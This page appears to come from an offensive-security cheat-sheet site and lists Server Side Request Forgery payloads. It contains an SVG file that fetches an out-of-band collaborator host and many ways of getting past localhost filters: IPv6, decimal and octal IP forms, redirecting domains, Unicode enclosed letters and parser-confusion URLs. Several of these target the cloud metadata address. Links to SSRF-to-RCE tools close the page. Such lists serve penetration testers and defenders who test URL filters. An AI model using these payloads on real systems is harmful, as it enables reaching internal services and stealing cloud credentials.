pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By GitBook
Server Side Request Forgery (SSRF)

Payloads

SSRF in SVG file

1
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
2
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
3
<image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
4
</svg>
Copied!

Localhost Bypasses

Using [::]

1
http://[::]:80/ #HTTP
2
http://[::]:25/ #SMTP
3
http://[::]:22/ #SSH
4
http://[::]:3128/ #SQUID
5
http://0000::1:80/ #HTTP
6
http://0000::1:25/ #SMTP
7
http://0000::1:22/ #SSH
8
http://0000::1:3128/ #SQUID
Copied!

Using a domain redirection

1
http://spoofed.burpcollaborator.net
2
http://localtest.me
3
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
4
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
5
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
Copied!

Using CIDR

1
http://127.127.127.127
2
http://127.0.1.3
3
http://127.0.0.0
Copied!

Using decimal IP location

1
http://2130706433/ = http://127.0.0.1
2
http://3232235521/ = http://192.168.0.1
3
http://3232235777/ = http://192.168.1.1
4
http://2852039166/ = http://169.254.169.254
Copied!

Using Octal IP

1
http://0177.0.0.1/ = http://127.0.0.1
2
http://o177.0.0.1/ = http://127.0.0.1
3
http://0o177.0.0.1/ = http://127.0.0.1
4
http://q177.0.0.1/ = http://127.0.0.1
Copied!

Using IPv6/IPv4 Address Embedding

1
http://[0:0:0:0:0:ffff:127.0.0.1]
2
3
#Cloud Metadata
4
http://[::ffff:169.254.169.254]
5
http://[0:0:0:0:0:ffff:169.254.169.254]
Copied!

Using malformed urls

1
localhost:+11211aaa
2
localhost:00011211aaaa
Copied!

Using weird address

1
http://0/
2
http://127.1
3
http://127.0.1
Copied!

Using enclosed alphanumerics

1
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
2
3
List:
4
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Copied!

Against a weak parser

1
http://127.1.1.1:80\@127.2.2.2:80/
2
http://127.1.1.1:80\@@127.2.2.2:80/
3
http://127.1.1.1:80:\@@127.2.2.2:80/
4
http://127.1.1.1:80#\@127.2.2.2:80/
Copied!

References

GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
GitHub
Gopherus - Tool to generate gopher link for exploiting SSRF and gaining RCE in various servers
GitHub - knassar702/lorsrf: find the parameters that can be used to find SSRF or Out-of-band resource load
GitHub
lorsrf - SSRF parameter bruteforce (use scant3r module instead)
PayloadsAllTheThings/Server Side Request Forgery at master · swisskyrepo/PayloadsAllTheThings
GitHub
SSRF Payloads Repository
Previous
WAF Bypasses
Next - WEB ATTACKS
Server Side Template Injection (SSTI)
Last modified 6mo ago
Copy link
Contents
Payloads
SSRF in SVG file
Localhost Bypasses
Using [::]
Using a domain redirection
Using CIDR
Using decimal IP location
Using Octal IP
Using IPv6/IPv4 Address Embedding
Using malformed urls
Using weird address
Using enclosed alphanumerics
Against a weak parser
References